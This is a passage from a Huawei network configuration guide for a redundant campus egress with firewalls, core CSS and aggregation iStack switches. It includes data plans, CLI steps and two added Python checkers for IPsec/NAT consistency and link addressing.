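            elif parts[0] in ("ike-peer", "proposal"):
                ctx[1][parts[0]] = parts[1]
        elif ctx[0] == "iface" and parts[:2] == ["ipsec", "policy"]:
            cfg["interfaces"][ctx[1]]["ipsec"] = parts[2]
        elif ctx[0] == "iface" and parts[:2] == ["nat", "outbound"]:
            cfg["interfaces"][ctx[1]]["nat"] = int(parts[2])
    return cfg


def lint(cfg):
    """Return findings as strings; an empty list means the configuration is consistent."""
    problems = []
    for pol in cfg["policies"]:
        tag = f"ipsec policy {pol['name']} {pol['seq']}"
        if pol.get("acl") not in cfg["acls"]:
            problems.append(f"{tag}: security acl {pol.get('acl')} is not defined")
        if pol.get("ike-peer") not in cfg["peers"]:
            problems.append(f"{tag}: ike-peer {pol.get('ike-peer')} is not defined")
        if pol.get("proposal") not in cfg["proposals"]:
            problems.append(f"{tag}: proposal {pol.get('proposal')} is not defined")
    for name, iface in cfg["interfaces"].items():
        if "ipsec" not in iface or "nat" not in iface:
            continue  # only an interface that both encrypts and translates needs the check
        nat_rules = cfg["acls"].get(iface["nat"], [])
        first_permit = min((n for n, a, _, _ in nat_rules if a == "permit"), default=None)
        for pol in cfg["policies"]:
            if pol["name"] != iface["ipsec"]:
                continue
            for _, action, src, dst in cfg["acls"].get(pol.get("acl"), []):
                if action != "permit":
                    continue
                denies = [n for n, a, s, d in nat_rules if a == "deny" and (s, d) == (src, dst)]
                if not denies or (first_permit is not None and min(denies) > first_permit):
                    problems.append(f"{name}: VPN flow {src} -> {dst} is not denied in nat acl "
                                    f"{iface['nat']} before rule {first_permit}")
    return problems
```

The same linter applied to the RouterB and RouterC files returns no findings, since they carry the mirror-image ACL pairs; removing one deny rule from ACL 3000, or misspelling the ike-peer name in the policy, produces exactly one finding naming the flow or the reference.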

2.2 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are Connected to Core Switches in In-line Mode)

Networking Requirements
As shown in Figure 2-2, at the egress of a large-scale campus, core switches are directly
connected to firewalls and connected to egress gateways through the firewalls. The firewalls
filter incoming and outgoing traffic of the campus to ensure network security. The network
requirements are as follows:
l Users on the internal network use private IP addresses and user IP addresses are
allocated using DHCP.
l Users in department A can access the Internet, and users in department B cannot access
the Internet.
l Users on internal and external networks can access the HTTP server.
l Each node uses the redundancy design to ensure network reliability.

Figure 2-2 Networking for configuring the egress of a large-scale campus (firewalls are connected to core switches in in-line mode)

[Figure: Router1 and Router2 connect to the Internet access points through GE0/0/2 and to FW1 and FW2 through GE0/0/1. FW1 and FW2 (GE1/0/1 uplink, GE1/0/7 heartbeat link, GE2/0/3 and GE2/0/4 in Eth-Trunk 10 and Eth-Trunk 20) connect to the CSS formed by Switch1 (master) and Switch2 (standby); the routers, firewalls and CSS are in OSPF area 0 and the HTTP server is attached to the CSS. Eth-Trunk 100 and Eth-Trunk 200 connect the CSS to AGG1 (Switch3 master, Switch4 standby; department A, OSPF area 1) and AGG2 (Switch5 master, Switch6 standby; department B, OSPF area 2).]

Deployment
l Routing deployment
– Router ID: Configure a loopback interface address as the router ID on each device.
– Add egress routers, firewalls, and core switches to OSPF area 0. Configure egress
routers as Autonomous System Border Routers (ASBRs) and core switches as Area
Border Routers (ABRs).
– Configure Open Shortest Path First (OSPF) areas 1 and 2 for departments A and B,
respectively, and configure the two OSPF areas as Not-So-Stubby Areas (NSSAs)
to reduce the number of LSAs transmitted between OSPF areas.
– To guide uplink traffic on each device, configure a default route pointing to the
firewall on the core switch, configure a default route pointing to the egress router on
the firewall, and configure a default route pointing to the address of the
interconnected interface (public gateway address) of the carrier's device.
l Reliability deployment
You are advised to use CSS+iStack+Eth-Trunk to build a loop-free Ethernet.
– Deploy cluster switch system (CSS) on core switches and intelligent Stack (iStack)
on aggregation switches to ensure device-level reliability.
– To improve link reliability, use Eth-Trunks between core switches and firewalls,
between core switches and aggregation switches, and between aggregation switches
and access switches.
– Deploy the Huawei Redundancy Protocol (HRP) on firewalls to implement load
balancing.
l Dynamic Host Configuration Protocol (DHCP) deployment
– Configure the core switch as the DHCP server to allocate IP addresses to users.
– Configure the DHCP relay function on the aggregation switch to ensure that the
DHCP server can allocate IP addresses to users.
l Network Address Translation (NAT) deployment
– To ensure that users on the internal network can access the Internet, configure NAT
on uplink interfaces of the two egress routers to translate private addresses into
public addresses. Configure an access control list (ACL) to match the source IP
address of department A so that users of department A can access the Internet and
users of department B cannot access the Internet.
– To ensure that users on the external network can access the HTTP server, configure
the NAT server on two egress routers.
l Security deployment
Configure security policies on firewalls to filter traffic and ensure network security.

Device planning
Device Type                                            Device Model
------------------------------------------------------------------------------------------------------
Router1 and Router2                                    Huawei AR3600 series routers
FW1 and FW2                                            Huawei USG9000 series firewall
Core switches that constitute a CSS                    Huawei S7700/S9700/S12700 switches
Aggregation switches that constitute an iStack system  Huawei S5720EI series switches (service interface stacking)

Data Plan
Device       Interface           Member Interface       VLANIF Number  IP Address        Remote Device   Remote Interface Number
-------------------------------------------------------------------------------------------------------------------------------
Router1      GE0/0/1             -                      -              10.1.1.1/24       FW1             GE1/0/1
             GE0/0/2             -                      -              202.10.1.1/24     Assume that this interface is connected to an interface of a carrier's device and that its IP address is a public one allocated by the carrier.
Router2      GE0/0/1             -                      -              10.2.1.1/24       FW2             GE1/0/1
             GE0/0/2             -                      -              202.10.2.1/24     Assume that this interface is connected to an interface of a carrier's device and that its IP address is a public one allocated by the carrier.
FW1          GE1/0/1             -                      -              10.1.1.2/24       Router1         GE0/0/1
             GE1/0/7             -                      -              10.10.1.1/24      FW2             GE1/0/7
             Eth-Trunk 10        GE2/0/3, GE2/0/4       -              10.3.1.1/24       CSS             Eth-Trunk 10
FW2          GE1/0/1             -                      -              10.2.1.2/24       Router2         GE0/0/1
             GE1/0/7             -                      -              10.10.1.2/24      FW1             GE1/0/7
             Eth-Trunk 20        GE2/0/3, GE2/0/4       -              10.4.1.1/24       CSS             Eth-Trunk 20
CSS          GE1/1/0/10          -                      VLANIF 300     10.100.1.1        HTTP server     Ethernet interface
             Eth-Trunk 10        GE1/1/0/3, GE2/1/0/3   -              10.3.1.2/24       FW1             Eth-Trunk 10
             Eth-Trunk 20        GE1/1/0/4, GE2/1/0/4   -              10.4.1.2/24       FW2             Eth-Trunk 20
             Eth-Trunk 100       GE1/2/0/3, GE2/2/0/3   VLANIF 100     10.5.1.1/24       AGG1            Eth-Trunk 100
             Eth-Trunk 200       GE1/2/0/4, GE2/2/0/4   VLANIF 200     10.6.1.1/24       AGG2            Eth-Trunk 200
AGG1         Eth-Trunk 100       GE1/0/1, GE2/0/1       VLANIF 100     10.5.1.2/24       CSS             Eth-Trunk 100
             Eth-Trunk 500       GE1/0/5, GE2/0/5       VLANIF 500     192.168.1.1/24    Assume that this interface is used to connect to department A and that its IP address is the gateway address of department A.
AGG2         Eth-Trunk 200       GE1/0/1, GE2/0/1       VLANIF 100     10.6.1.2/24       CSS
             Eth-Trunk 600       GE1/0/5, GE2/0/5       VLANIF 600     192.168.2.1/24    Assume that this interface is used to connect to department B and that its IP address is the gateway address of department B.
HTTP server  Ethernet interface  -                      -              10.100.1.10/24    CSS             GE1/1/0/10
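The data plan lists each link from both ends, which makes it possible to check the plan before any device is configured. The following Python example is added here and is not part of the Huawei document: it encodes the point-to-point links of the plan and reports a link that is planned from only one end, two link ends in different subnets or with the same address, and any address assigned twice. It rests on two assumptions: the CSS GE1/1/0/10 address is taken as 10.100.1.1/24 (the table gives no prefix length), and AGG2 Eth-Trunk 200 is paired with CSS Eth-Trunk 200 (the table leaves that remote interface blank). The carrier and department rows, whose remote ends are only described in words, are left out, and the function names are the example's own.

```python
"""Consistency checks for a point-to-point IP data plan (added example,
not from the Huawei document)."""
import ipaddress

# Constructed from the data plan table above. Assumptions: the CSS GE1/1/0/10
# address is taken as /24, and AGG2 Eth-Trunk 200 is paired with CSS
# Eth-Trunk 200. Carrier uplinks and department gateways are left out.
PLAN = [
    # (device, interface, address, remote device, remote interface)
    ("Router1", "GE0/0/1", "10.1.1.1/24", "FW1", "GE1/0/1"),
    ("Router2", "GE0/0/1", "10.2.1.1/24", "FW2", "GE1/0/1"),
    ("FW1", "GE1/0/1", "10.1.1.2/24", "Router1", "GE0/0/1"),
    ("FW1", "GE1/0/7", "10.10.1.1/24", "FW2", "GE1/0/7"),
    ("FW1", "Eth-Trunk 10", "10.3.1.1/24", "CSS", "Eth-Trunk 10"),
    ("FW2", "GE1/0/1", "10.2.1.2/24", "Router2", "GE0/0/1"),
    ("FW2", "GE1/0/7", "10.10.1.2/24", "FW1", "GE1/0/7"),
    ("FW2", "Eth-Trunk 20", "10.4.1.1/24", "CSS", "Eth-Trunk 20"),
    ("CSS", "GE1/1/0/10", "10.100.1.1/24", "HTTP server", "Ethernet interface"),
    ("CSS", "Eth-Trunk 10", "10.3.1.2/24", "FW1", "Eth-Trunk 10"),
    ("CSS", "Eth-Trunk 20", "10.4.1.2/24", "FW2", "Eth-Trunk 20"),
    ("CSS", "Eth-Trunk 100", "10.5.1.1/24", "AGG1", "Eth-Trunk 100"),
    ("CSS", "Eth-Trunk 200", "10.6.1.1/24", "AGG2", "Eth-Trunk 200"),
    ("AGG1", "Eth-Trunk 100", "10.5.1.2/24", "CSS", "Eth-Trunk 100"),
    ("AGG2", "Eth-Trunk 200", "10.6.1.2/24", "CSS", "Eth-Trunk 200"),
    ("HTTP server", "Ethernet interface", "10.100.1.10/24", "CSS", "GE1/1/0/10"),
]


def check_plan(plan):
    """Return findings as strings; an empty list means the plan is consistent."""
    index = {(dev, intf): (ipaddress.ip_interface(addr), rdev, rintf)
             for dev, intf, addr, rdev, rintf in plan}
    owners = {}    # address -> interfaces that claim it
    problems = []
    for (dev, intf), (addr, rdev, rintf) in index.items():
        owners.setdefault(addr.ip, []).append(f"{dev} {intf}")
        peer = index.get((rdev, rintf))
        if peer is None:
            problems.append(f"{dev} {intf}: remote end {rdev} {rintf} is not in the plan")
            continue
        peer_addr, peer_rdev, peer_rintf = peer
        if (peer_rdev, peer_rintf) != (dev, intf):
            problems.append(f"{dev} {intf}: {rdev} {rintf} points back to {peer_rdev} {peer_rintf}")
        if peer_addr.network != addr.network:
            problems.append(f"{dev} {intf}: {addr} and {peer_addr} are in different subnets")
        elif peer_addr.ip == addr.ip:
            problems.append(f"{dev} {intf}: both ends of the link use {addr.ip}")
    for ip, names in owners.items():
        if len(names) > 1:
            problems.append(f"{ip} is assigned to {', '.join(names)}")
    return problems


def with_address(plan, device, interface, address):
    """Copy of the plan with one interface's address changed (for what-if checks)."""
    return [(d, i, address if (d, i) == (device, interface) else a, rd, ri)
            for d, i, a, rd, ri in plan]
```

Each link is reported from both of its ends, so a single wrong address produces two findings (one per end) and a duplicated address produces a third naming every interface that claims it.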

Configuration Roadmap
The configuration roadmap is as follows.

Step 1
  (1) Configure CSS on core switches.
  (2) Configure iStack on aggregation switches.
  Involved product: Core switches (Switch1 and Switch2) and aggregation switches (Switch3, Switch4, Switch5, and Switch6)

Step 2 Configure Eth-Trunks to improve the link reliability.
  (1) Configure Eth-Trunks between core switches (CSS) and firewalls.
  (2) Configure Eth-Trunks between core switches (CSS) and aggregation switches (AGG).
  (3) Configure Eth-Trunks between aggregation switches and access switches.
  Involved product: Core switches (CSS), firewalls (FW1 and FW2), and aggregation switches (AGG1 and AGG2)

Step 3 Assign an IP address to each interface.
  (1) Configure IP addresses for uplink and downlink interfaces of routers.
  (2) Configure IP addresses for uplink and downlink interfaces of firewalls.
  (3) Configure IP addresses for uplink and downlink interfaces of core switches.
  (4) Configure IP addresses for uplink and downlink interfaces of aggregation switches.
  Involved product: Routers (Router1 and Router2), firewalls (FW1 and FW2), core switches (CSS), and aggregation switches (AGG1 and AGG2)

Step 4 Configure a routing protocol. Configure OSPF on the internal network.
  (1) Configure OSPF area 0 on uplink interfaces of routers, firewalls, and core switches.
  (2) Configure OSPF areas 1 and 2 on core and aggregation switches, configure the two OSPF areas as NSSAs, and add downlink interfaces of core switches to NSSAs.
  (3) Configure a default route pointing to the firewall on the core switch, configure a default route pointing to the egress router on the firewall, and configure a default route pointing to the address of the interconnected interface (public gateway address) of the carrier's device.
  Involved product: Routers (Router1 and Router2), firewalls (FW1 and FW2), and core switches (CSS)

Step 5 Configure zones that interfaces belong to.
  (1) Add the interface connected to the external network to the untrusted zone.
  (2) Add the interface connected to the internal network to the trusted zone.
  (3) Add the heartbeat interface enabled with HRP to the DMZ.
  Involved product: Firewalls (FW1 and FW2)

Step 6 Configure HRP.
  (1) Associate VRRP Group Management Protocol (VGMP) groups with uplink and downlink interfaces.
  (2) Specify heartbeat interfaces and enable HRP.
  (3) Enable quick session backup to implement load balancing between two firewalls.
  Involved product: Firewalls (FW1 and FW2)

Step 7 Configure DHCP.
  (1) Configure the DHCP server on core switches and specify the address pool and gateway address.
  (2) Configure the DHCP relay function on aggregation switches.
  Involved product: Core switches (CSS) and aggregation switches (AGG1 and AGG2)

Step 8 Configure NAT.
  (1) Configure NAT on two egress routers so that users of department A can access the Internet and users of department B cannot access the Internet.
  (2) Configure the NAT server on two egress routers so that users on the external network can access the HTTP server.
  Involved product: Egress routers (Router1 and Router2)

Step 9 Configure attack defense and enable defense against SYN Flood attacks and HTTP Flood attacks on firewalls to protect internal servers against attacks.
  Involved product: Firewalls

Procedure
Step 1 Configure CSS on core switches.
1. Connect cables of CSS cards. CSS card EH1D2VS08000 is used as an example.

Figure 2-3 CSS networking

NOTE

– One CSS card can only be connected to one CSS card in the other chassis but not the local
chassis.
– An interface in group 1 of a CSS card can be connected to any interface in group 1 of the CSS
card on the other chassis. The requirements for interfaces in group 2 are the same.
– CSS cards have the same number of cluster cables connected. (If the CSS cards have different
numbers of cluster cables connected, the total cluster bandwidth depends on the cluster with
the least cluster cables connected.) In addition, interfaces on CSS cards are connected based on
the interface number.
2. Configure the CSS function on Switch1 and use CSS card connection (the default value
does not need to be configured). Use the default CSS ID 1 (the default value does not
need to be configured) and set the CSS priority to 100.
<HUAWEI> system-view
[HUAWEI] set css mode css-card //Default setting. You do not need to run this command. The step is used for reference.
[HUAWEI] set css id 1 //Default setting. You do not need to run this command. The step is used for reference.
[HUAWEI] set css priority 100 //The default CSS priority is 1. Change the priority of the master switch to be higher than that of the standby switch.
[HUAWEI] css enable
Warning: The CSS configuration takes effect only after the system is rebooted. The next CSS mode is CSS-Card. Reboot now? [Y/N]:Y //Restart the switch.

3. Configure the CSS function on Switch2. Use CSS card connection (the default value
does not need to be configured). Set the CSS ID to 2 and use default CSS priority 1 (the
default value does not need to be configured).
<HUAWEI> system-view
[HUAWEI] set css id 2 //The default CSS ID is 1. Change the CSS ID to 2.
[HUAWEI] css enable
Warning: The CSS configuration takes effect only after the system is rebooted. The next CSS mode is CSS-Card. Reboot now? [Y/N]:Y //Restart the switch.

4. Check the CSS status after the switches restart.
The MASTER indicator on the MPU is steady green, as shown in Figure 2-4.
– On Switch1, the CSS ID indicators numbered 1 on both MPUs are steady green. On
Switch2, the CSS ID indicators numbered 2 on both MPUs are steady green.
– The LINK/ALM indicators of interfaces on all CSS cards connected to cluster
cables are steady green.
– The MASTER indicators on all CSS cards in the active chassis are steady green,
and the MASTER indicators on all CSS cards in the standby chassis are off.

Figure 2-4 Indicators of the MPU and CSS card

NOTE

After the CSS is established, subsequent operations will be performed on the master switch and
data will be automatically synchronized to the standby switch. In a CSS, the physical interface
number is in the format of interface type chassis ID/slot ID/interface card ID/interface sequence
number, for example, 10GE1/1/0/9.

Step 2 Configure iStack on aggregation switches. S5720EI series switches are used as an example.
Service interface stacking is used.
NOTE

Switch3 and Switch4 are used as an example. The configurations of Switch5 and Switch6 are similar,
and are not mentioned here.
Connect cables after the iStack configuration is complete.
1. Configure logical stack interfaces and add physical member interfaces to them.
NOTE

Physical member interfaces of logical stack interface stack-port n/1 on one switch can only be
connected to the interfaces of stack-port n/2 on a neighboring switch.

# Configure service interface GE0/0/28 on Switch3 as the physical member interface and
add it to the corresponding logical stack interface.
[Switch3] interface stack-port 0/1
[Switch3-stack-port0/1] port interface gigabitethernet 0/0/28 enable
Warning: Enabling stack function may cause configuration loss on the
interface, continue?[Y/N]:Y
Info: This operation may take a few seconds. Please wait for a moment.......
[Switch3-stack-port0/1] quit

# Configure service interface GE0/0/28 on Switch4 as the physical member interface and
add it to the corresponding logical stack interface.
[Switch4] interface stack-port 0/2
[Switch4-stack-port0/2] port interface gigabitethernet 0/0/28 enable
Warning: Enabling stack function may cause configuration loss on the
interface, continue?[Y/N]:Y
Info: This operation may take a few seconds. Please wait for a moment.......
[Switch4-stack-port0/2] quit

2. Configure stack IDs and stack priorities.

# Set the stack priority of Switch3 to 200.
[Switch3] stack slot 0 priority 200
Warning: Please do not frequently modify Priority, it will make the stack
split, continue?[Y/N]:Y

# Set the stack ID of Switch3 to 1.
[Switch3] stack slot 0 renumber 1
Warning: All the configurations related to the slot ID will be lost after the
slot ID is modified.
Please do not frequently modify slot ID, it will make the stack split.
Continue?[Y/N]:Y
Info: Stack configuration has been changed, and the device needs to restart
to make the configuration effective.

# Set the stack ID of Switch4 to 2.
[Switch4] stack slot 0 renumber 2
Warning: All the configurations related to the slot ID will be lost after the
slot ID is modified.
Please do not frequently modify slot ID, it will make the stack split.
Continue?[Y/N]:Y
Info: Stack configuration has been changed, and the device needs to restart
to make the configuration effective.

3. Power off Switch3 and Switch4 and connect their GE0/0/28 interfaces using an SFP+ stack cable.
NOTE

Run the save command to save the configurations before you power off the switches.
stack-port 0/1 of one switch must be connected to stack-port 0/2 of another switch. Otherwise, the
stack cannot be set up.

Figure 2-5 Stack networking: Switch3 GE0/0/28 <---- iStack link ----> GE0/0/28 Switch4

4. Power on the switches.
To specify a member switch as the master switch, power on that switch first. For example, if Switch3 needs to be the master switch, power on Switch3 first and then Switch4.
5. Check whether the stack is set up successfully.
[Switch3] display stack
Stack topology type: Link

Stack system MAC: 0018-82b1-6eb4
MAC switch delay time: 2 min
Stack reserved vlan: 4093
Slot of the active management port: --
Slot Role Mac address Priority Device type
-------------------------------------------------------------
1 Master 0018-82b1-6eb4 200 S5720-36C-EI-AC
2 Standby 0018-82b1-6eba 150 S5720-36C-EI-AC

The output shows one master and one standby switch, which indicates that the stack has been set up successfully.
Step 3 Configure inter-chassis Eth-Trunks between the CSS and firewalls and between the CSS and
aggregation switches.
1. On firewalls, configure Eth-Trunks between the CSS and firewalls.
# On FW1, create Eth-Trunk 10 to connect to the CSS and add member interfaces to Eth-
Trunk 10.
[FW1] interface eth-trunk 10 //Create Eth-Trunk 10 to connect to the CSS.
[FW1-Eth-Trunk10] quit
[FW1] interface gigabitethernet 2/0/3
[FW1-GigabitEthernet2/0/3] eth-trunk 10
[FW1-GigabitEthernet2/0/3] quit
[FW1] interface gigabitethernet 2/0/4
[FW1-GigabitEthernet2/0/4] eth-trunk 10
[FW1-GigabitEthernet2/0/4] quit

# On FW2, create Eth-Trunk 20 to connect to the CSS and add member interfaces to Eth-
Trunk 20.
[FW2] interface eth-trunk 20 //Create Eth-Trunk 20 to connect to the CSS.
[FW2-Eth-Trunk20] quit
[FW2] interface gigabitethernet 2/0/3
[FW2-GigabitEthernet2/0/3] eth-trunk 20
[FW2-GigabitEthernet2/0/3] quit
[FW2] interface gigabitethernet 2/0/4
[FW2-GigabitEthernet2/0/4] eth-trunk 20
[FW2-GigabitEthernet2/0/4] quit
2. In the CSS, configure inter-chassis Eth-Trunks between the CSS and firewalls and
between the CSS and aggregation switches.
# In the CSS, create Eth-Trunk 10 to connect to FW1 and add member interfaces to Eth-
Trunk 10.
[CSS] interface eth-trunk 10 //Create Eth-Trunk 10 to connect to FW1.
[CSS-Eth-Trunk10] quit
[CSS] interface gigabitethernet 1/1/0/3
[CSS-GigabitEthernet1/1/0/3] eth-trunk 10
[CSS-GigabitEthernet1/1/0/3] quit
[CSS] interface gigabitethernet 2/1/0/3
[CSS-GigabitEthernet2/1/0/3] eth-trunk 10
[CSS-GigabitEthernet2/1/0/3] quit

# In the CSS, create Eth-Trunk 20 to connect to FW2 and add member interfaces to Eth-
Trunk 20.
[CSS] interface eth-trunk 20 //Create Eth-Trunk 20 to connect to FW2.
[CSS-Eth-Trunk20] quit
[CSS] interface gigabitethernet 1/1/0/4
[CSS-GigabitEthernet1/1/0/4] eth-trunk 20
[CSS-GigabitEthernet1/1/0/4] quit
[CSS] interface gigabitethernet 2/1/0/4
[CSS-GigabitEthernet2/1/0/4] eth-trunk 20
[CSS-GigabitEthernet2/1/0/4] quit

# In the CSS, create Eth-Trunk 100 to connect to AGG1 and add member interfaces to
Eth-Trunk 100.
[CSS] interface eth-trunk 100 //Create Eth-Trunk 100 to connect to AGG1.
[CSS-Eth-Trunk100] quit

[CSS] interface gigabitethernet 1/2/0/3
[CSS-GigabitEthernet1/2/0/3] eth-trunk 100
[CSS-GigabitEthernet1/2/0/3] quit
[CSS] interface gigabitethernet 2/2/0/3
[CSS-GigabitEthernet2/2/0/3] eth-trunk 100
[CSS-GigabitEthernet2/2/0/3] quit

# In the CSS, create Eth-Trunk 200 to connect to AGG2 and add member interfaces to
Eth-Trunk 200.
[CSS] interface eth-trunk 200 //Create Eth-Trunk 200 to connect to AGG2.
[CSS-Eth-Trunk200] quit
[CSS] interface gigabitethernet 1/2/0/4
[CSS-GigabitEthernet1/2/0/4] eth-trunk 200
[CSS-GigabitEthernet1/2/0/4] quit
[CSS] interface gigabitethernet 2/2/0/4
[CSS-GigabitEthernet2/2/0/4] eth-trunk 200
[CSS-GigabitEthernet2/2/0/4] quit

3. On the aggregation switches, configure Eth-Trunks between the aggregation switches and the CSS and between the aggregation switches and the access switches.
# Configure AGG1.
[AGG1] interface eth-trunk 100 //Create Eth-Trunk 100 to connect to the CSS.
[AGG1-Eth-Trunk100] quit
[AGG1] interface gigabitethernet 1/0/1
[AGG1-GigabitEthernet1/0/1] eth-trunk 100
[AGG1-GigabitEthernet1/0/1] quit
[AGG1] interface gigabitethernet 2/0/1
[AGG1-GigabitEthernet2/0/1] eth-trunk 100
[AGG1-GigabitEthernet2/0/1] quit
[AGG1] interface eth-trunk 500 //Create Eth-Trunk 500 to connect to the
access switch.
[AGG1-Eth-Trunk500] quit
[AGG1] interface gigabitethernet 1/0/5
[AGG1-GigabitEthernet1/0/5] eth-trunk 500
[AGG1-GigabitEthernet1/0/5] quit
[AGG1] interface gigabitethernet 2/0/5
[AGG1-GigabitEthernet2/0/5] eth-trunk 500
[AGG1-GigabitEthernet2/0/5] quit

# Configure AGG2.
[AGG2] interface eth-trunk 200 //Create Eth-Trunk 200 to connect to the CSS.
[AGG2-Eth-Trunk200] quit
[AGG2] interface gigabitethernet 1/0/1
[AGG2-GigabitEthernet1/0/1] eth-trunk 200
[AGG2-GigabitEthernet1/0/1] quit
[AGG2] interface gigabitethernet 2/0/1
[AGG2-GigabitEthernet2/0/1] eth-trunk 200
[AGG2-GigabitEthernet2/0/1] quit
[AGG2] interface eth-trunk 600 //Create Eth-Trunk 600 to connect to the
access switch.
[AGG2-Eth-Trunk600] quit
[AGG2] interface gigabitethernet 1/0/5
[AGG2-GigabitEthernet1/0/5] eth-trunk 600
[AGG2-GigabitEthernet1/0/5] quit
[AGG2] interface gigabitethernet 2/0/5
[AGG2-GigabitEthernet2/0/5] eth-trunk 600
[AGG2-GigabitEthernet2/0/5] quit

Step 4 Assign an IP address to each interface.
# Configure Router1.
[Router1] interface loopback 0
[Router1-LoopBack0] ip address 1.1.1.1 32 //Configure the IP address as the
router ID.
[Router1-LoopBack0] quit
[Router1] interface gigabitethernet 0/0/2
[Router1-GigabitEthernet0/0/2] ip address 202.10.1.1 24 //Configure an IP
address for the interface connected to the external network.

[Router1-GigabitEthernet0/0/2] quit
[Router1] interface gigabitethernet 0/0/1
[Router1-GigabitEthernet0/0/1] ip address 10.1.1.1 24 //Configure an IP address
for the interface connected to FW1.
[Router1-GigabitEthernet0/0/1] quit

# Configure Router2.
[Router2] interface loopback 0
[Router2-LoopBack0] ip address 2.2.2.2 32 //Configure the IP address as the
router ID.
[Router2-LoopBack0] quit
[Router2] interface gigabitethernet 0/0/2
[Router2-GigabitEthernet0/0/2] ip address 202.10.2.1 24 //Configure an IP
address for the interface connected to the external network.
[Router2-GigabitEthernet0/0/2] quit
[Router2] interface gigabitethernet 0/0/1
[Router2-GigabitEthernet0/0/1] ip address 10.2.1.1 24 //Configure an IP address
for the interface connected to FW2.
[Router2-GigabitEthernet0/0/1] quit

# Configure FW1.
[FW1] interface loopback 0
[FW1-LoopBack0] ip address 3.3.3.3 32 //Configure the IP address as the router
ID.
[FW1-LoopBack0] quit
[FW1] interface gigabitethernet 1/0/1
[FW1-GigabitEthernet1/0/1] ip address 10.1.1.2 24 //Configure an IP address for
the interface connected to Router1.
[FW1-GigabitEthernet1/0/1] quit
[FW1] interface gigabitethernet 1/0/7
[FW1-GigabitEthernet1/0/7] ip address 10.10.1.1 24 //Configure an IP address
for the heartbeat interface enabled with HSB.
[FW1-GigabitEthernet1/0/7] quit
[FW1] interface eth-trunk 10
[FW1-Eth-Trunk10] ip address 10.3.1.1 24 //Configure an IP address for the Eth-
Trunk connected to the CSS.
[FW1-Eth-Trunk10] quit

# Configure FW2.
[FW2] interface loopback 0
[FW2-LoopBack0] ip address 4.4.4.4 32 //Configure the IP address as the Router
ID.
[FW2-LoopBack0] quit
[FW2] interface gigabitethernet 1/0/1
[FW2-GigabitEthernet1/0/1] ip address 10.2.1.2 24 //Configure an IP address for
the interface connected to Router2.
[FW2-GigabitEthernet1/0/1] quit
[FW2] interface gigabitethernet 1/0/7
[FW2-GigabitEthernet1/0/7] ip address 10.10.1.2 24 //Configure an IP address
for the heartbeat interface enabled with HSB.
[FW2-GigabitEthernet1/0/7] quit
[FW2] interface eth-trunk 20
[FW2-Eth-Trunk20] ip address 10.4.1.1 24 //Configure an IP address for the Eth-
Trunk connected to the CSS.
[FW2-Eth-Trunk20] quit

# Configure CSS.
[CSS] interface loopback 0
[CSS-LoopBack0] ip address 5.5.5.5 32 //Configure the IP address as the Router
ID.
[CSS-LoopBack0] quit
[CSS] interface eth-trunk 10
[CSS-Eth-Trunk10] undo portswitch //By default, an Eth-Trunk works in Layer 2
mode. To use an Eth-Trunk as a Layer 3 interface, run the undo portswitch command
to switch the Eth-Trunk to Layer 3 mode.
[CSS-Eth-Trunk10] ip address 10.3.1.2 24 //Configure an IP address for the Eth-
Trunk connected to FW1.
[CSS-Eth-Trunk10] quit
[CSS] interface eth-trunk 20

[CSS-Eth-Trunk20] undo portswitch //By default, an Eth-Trunk works in Layer 2 mode. To use an Eth-Trunk as a Layer 3 interface, run the undo portswitch command to switch the Eth-Trunk to Layer 3 mode.
[CSS-Eth-Trunk20] ip address 10.4.1.2 24 //Configure an IP address for the Eth-
Trunk connected to FW2.
[CSS-Eth-Trunk20] quit
[CSS] vlan batch 100 200 300 //Create VLANs in a batch.
[CSS] interface eth-trunk 100
[CSS-Eth-Trunk100] port link-type hybrid
[CSS-Eth-Trunk100] port hybrid pvid vlan 100
[CSS-Eth-Trunk100] port hybrid untagged vlan 100
[CSS-Eth-Trunk100] quit
[CSS] interface vlanif 100
[CSS-Vlanif100] ip address 10.5.1.1 24 //Configure an IP address for the
interface connected to aggregation switch AGG1.
[CSS-Vlanif100] quit
[CSS] interface eth-trunk 200
[CSS-Eth-Trunk200] port link-type hybrid
[CSS-Eth-Trunk200] port hybrid pvid vlan 200
[CSS-Eth-Trunk200] port hybrid untagged vlan 200
[CSS-Eth-Trunk200] quit
[CSS] interface vlanif 200
[CSS-Vlanif200] ip address 10.6.1.1 24 //Configure an IP address for the
interface connected to aggregation switch AGG2.
[CSS-Vlanif200] quit
[CSS] interface gigabitethernet 1/1/0/10 //Enter the view of the interface
connected to the HTTP server.
[CSS-GigabitEthernet1/1/0/10] port link-type access
[CSS-GigabitEthernet1/1/0/10] port default vlan 300 //Add the access interface
to VLAN 300.
[CSS-GigabitEthernet1/1/0/10] quit
[CSS] interface vlanif 300
[CSS-Vlanif300] ip address 10.100.1.1 24 //Configure an IP address for the
interface connected to the HTTP server.
[CSS-Vlanif300] quit

# Configure AGG1.
[AGG1] interface loopback 0
[AGG1-LoopBack0] ip address 6.6.6.6 32 //Configure the IP address as the router
ID.
[AGG1-LoopBack0] quit
[AGG1] vlan batch 100 500
[AGG1] interface eth-trunk 100
[AGG1-Eth-Trunk100] port link-type hybrid
[AGG1-Eth-Trunk100] port hybrid pvid vlan 100
[AGG1-Eth-Trunk100] port hybrid untagged vlan 100
[AGG1-Eth-Trunk100] quit
[AGG1] interface vlanif 100
[AGG1-Vlanif100] ip address 10.5.1.2 24 //Configure an IP address for the
interface connected to the CSS.
[AGG1-Vlanif100] quit
[AGG1] interface eth-trunk 500
[AGG1-Eth-Trunk500] port link-type hybrid
[AGG1-Eth-Trunk500] port hybrid pvid vlan 500
[AGG1-Eth-Trunk500] port hybrid untagged vlan 500
[AGG1-Eth-Trunk500] quit
[AGG1] interface vlanif 500
[AGG1-Vlanif500] ip address 192.168.1.1 24 //Configure an IP address for the
interface connected to the access switch and configure it as the gateway address
of department A.
[AGG1-Vlanif500] quit

# Configure AGG2.
[AGG2] interface loopback 0
[AGG2-LoopBack0] ip address 7.7.7.7 32 //Configure the IP address as the router
ID.
[AGG2-LoopBack0] quit
[AGG2] vlan batch 200 600
[AGG2] interface eth-trunk 200
[AGG2-Eth-Trunk200] port link-type hybrid

[AGG2-Eth-Trunk200] port hybrid pvid vlan 200
[AGG2-Eth-Trunk200] port hybrid untagged vlan 200
[AGG2-Eth-Trunk200] quit
[AGG2] interface vlanif 200
[AGG2-Vlanif200] ip address 10.6.1.2 24 //Configure an IP address for the
interface connected to the CSS.
[AGG2-Vlanif200] quit
[AGG2] interface eth-trunk 600
[AGG2-Eth-Trunk600] port link-type hybrid
